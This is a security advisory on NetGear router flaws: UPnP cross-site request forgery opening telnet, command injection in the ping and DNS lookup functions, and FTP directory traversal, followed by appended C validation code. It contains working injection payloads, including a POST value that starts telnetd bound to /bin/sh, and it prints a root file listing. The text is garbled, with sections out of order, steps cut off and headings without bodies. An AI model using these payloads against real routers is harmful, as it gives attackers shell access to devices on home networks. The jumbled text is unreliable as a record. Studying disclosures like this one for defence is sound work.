Error validating proxy id netgear

This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.


Proof of concept
----------------
The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog backdoor (see issue 5). Port 23 is the internal port number and port 887 is the external port number to be opened.

The GearDog backdoor is a known remote access backdoor implemented in many NetGear products.

Solution
--------
Ensure that UPNP requests sent through HTTP POST parameters are not honoured.

Command Execution with Ping
===============================

Requires
--------
Authenticated access to the web administration interface.

For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.') 3.

Blind Command Execution with DNS Lookup
===========================================

Requires
--------
Authenticated access to the web administration interface.

Description
-----------
The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks.

This can be used to bypass or alter firewall rules.

Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:

POST /HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

host_name=|sleep 5&lookup=Lookup

To get an interactive shell,

1. Send the following POST data:

hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup

2.

If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.

FTP Insecure Root Directory
===============================

Requires
--------
FTP to be enabled (not enabled by default)

Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.

ftp ls /
200 PORT 192.168.0.927 OK
150 BINARY data connection established.

It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.

-rw-r--r-- 1 nobody root 2 Jan 01 2003 all_no_password
-rw-r--r-- 1 nobody root 1700 Jan 01 2003
drwxr-xr-x 3 nobody root 0 Jan 01 2003 conf
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan3_time
-r--r--r-- 1 nobody root 1430 Jan 01 2003 lan_dev
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan_time
drwxr-xr-x 48 nobody root 0 Jan 01 2003 mnt
-rw-r--r-- 1 nobody root 1 Jan 01 2003
-rw-r--r-- 1 nobody root 0 Jan 01 2003
-rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns_
drwxr-xr-x 2 nobody root 0 Jan 01 2003 ppp
-rw-r--r-- 1 nobody root 38 Jan 01 2003
-rw-r--r-- 1 nobody root 208 Jan 01 2003
drwxr-xr-x 4 nobody root 0 Jan 01 2003 samba
drwxr-xr-x 2 nobody root 0 Jan 01 2003 shares
-rw-r--r-- 1 nobody root 262 Jan 01 2003 space_info
-rw------- 1 nobody root 2 Oct 14 timesync
-rw-r--r-- 1 nobody root 242 Jan 01 2003
-rw-r--r-- 1 nobody root 0 Jan 01 2003 udhcpd.leases
-rw-r--r-- 1 nobody root 4 Jan 01 2003
-rw-r--r-- 1 nobody root 2 Jan 01 2003 udhcpd_
-rw-r--r-- 1 nobody root 3562 Jan 01 2003 upnp_xml
drwxr-xr-x 2 nobody root 0 Jan 01 2003 usb_vol_name
drwxr-xr-x 11 nobody root 0 Jan 01 2003 var
-r--r--r-- 1 nobody root 1922 Jan 01 2003 wan_dev
-rw-r--r-- 1 nobody root 3 Jan 01 2003 wan_time
drwxr-xr-x 2 nobody root 0 Jan 01 1999 wlan
-rw-r--r-- 1 nobody root 2 Jan 01 2003 wlan_time
-rw-r--r-- 1 nobody root 0 Jan 01 2003
226 Directory list has been submitted.

Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection.
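The allow-list rule quoted earlier for IPv4 values, extended to hostnames and paired with a shell-free process launch, as an added example that is not part of the original advisory or of NetGear's firmware. The function names and the choice of `nslookup` as the lookup tool are assumptions made for illustration.

```c
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check for an IPv4 literal: only '0'-'9' and '.', then a strict parse. */
int is_valid_ipv4(const char *s) {
    struct in_addr addr;
    size_t len = strlen(s);
    if (len < 7 || len > 15) return 0;              /* "0.0.0.0" .. "255.255.255.255" */
    if (strspn(s, "0123456789.") != len) return 0;  /* rejects |, ;, &, spaces, ... */
    return inet_pton(AF_INET, s, &addr) == 1;       /* four octets, each 0-255 */
}

/* Allow-list check for a DNS name: labels of [A-Za-z0-9-], 1-63 chars, no edge hyphen. */
int is_valid_hostname(const char *s) {
    size_t len = strlen(s), label = 0;
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-') return 0;  /* empty label or trailing '-' */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > 63) return 0;
        } else {
            return 0;                                     /* any shell metacharacter lands here */
        }
    }
    return label > 0 && s[len - 1] != '-';
}

/* Hypothetical handler (assumed name): validate, then exec with an argv array, no shell. */
int safe_lookup(const char *host) {
    if (!is_valid_ipv4(host) && !is_valid_hostname(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("nslookup", "nslookup", host, (char *)NULL);  /* host is one argv entry */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Rejecting a leading hyphen in every label also keeps a value such as `-p` from being read by the tool as an option.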
